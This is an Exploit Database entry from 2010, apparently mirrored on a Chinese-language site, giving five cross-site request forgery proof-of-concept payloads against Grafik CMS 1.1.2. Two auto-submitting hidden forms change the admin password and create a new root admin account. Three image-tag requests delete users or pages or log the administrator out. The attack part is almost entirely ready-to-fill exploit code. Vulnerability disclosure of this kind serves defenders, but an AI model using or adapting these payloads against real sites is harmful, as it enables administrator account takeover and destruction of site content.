Grafik CMS 1.1.2 – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 107 阅读

• 作者： 10n1z3d
  日期： 2010-07-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14342/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

  <!--- Title: Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities Author: 10n1z3d <10n1z3d[at]w[dot]cn> Date: Mon 12 Jul 2010 07:07:22 PM EEST Vendor: http://www.grafik-power.com/grafik_cms/ Download: None --->   -=[ CSRF PoC 1 - Change Admin Password ]=-   <html> <head> <title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Change Admin Password</title> </head> <body onload="document.csrf.submit();"> <form name="csrf" action="http://[domain]/admin/admin.php?action=edit_user&id=1" method="post"> <!--- Edit these ---> <input type="hidden" name="name" value="root" /> <input type="hidden" name="username" value="root" /> <input type="hidden" name="password" value="rootroot" /> </form> </body> </html>   -=[ CSRF PoC 2 - Create Admin User ]=-   <html> <head> <title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Create Admin User</title> </head> <body onload="document.csrf.submit();"> <form name="csrf" action="http://[domain]/admin/admin.php?action=add_user" method="post"> <!--- Edit these ---> <input type="hidden" name="name" value="root" /> <input type="hidden" name="username" value="root" /> <input type="hidden" name="password" value="rootroot" /> </form> </body> </html> -=[ CSRF PoC 3 - Delete User ]=-   <img src="http://[domain]/admin/admin.php?action=liste_user&del=[user id]" alt="Do you see this?" /> -=[ CSRF PoC 4 - Delete Page ]=-   <img src="http://[domain]/admin/admin.php?action=liste_pages&del=[page id]" alt="Do you see this?" /> -=[ CSRF PoC 5 - Logout The Administrator ]=-   <img src="http://[domain]/admin/index.php?action=deconnexion" alt="Do you see this?" />   <!--- http://www.evilzone.org/ irc.evilzone.org(6697 / 9999) --->